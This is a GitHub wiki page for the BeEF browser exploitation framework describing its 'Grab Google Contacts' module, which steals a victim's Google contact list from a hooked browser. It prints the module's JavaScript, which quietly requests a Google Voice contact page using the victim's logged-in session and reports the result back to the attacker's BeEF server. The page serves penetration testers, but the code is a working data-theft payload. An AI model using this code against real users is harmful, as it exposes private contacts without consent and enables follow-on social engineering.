-
Notifications
You must be signed in to change notification settings - Fork 2.1k
Module: Grab Google Contacts
Haoxi Tan edited this page Jan 10, 2020
·
2 revisions
-
Objective: get google contacts
-
Authors: Kos, antisnatchor
-
Browsers: Chrome
sends XHR requests to a google voice url. If the user is logged in, the list of contacts can be obtained
This can run on normal javascript, does not need extension/plugin privileges.
function grabContacts(){
var client = new XMLHttpRequest();
client.open("GET", "https://www.google.com/voice/c/b/X/ui/ContactManager" ,false);
client.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
client.send();
if(client.status != 200){ // if the victim is not authenticated in Google, a 403 Forbidden error is received.
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'The victim is not logged in Google.');
}else{ //proceed
toolContact(client.responseText);
}
}- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK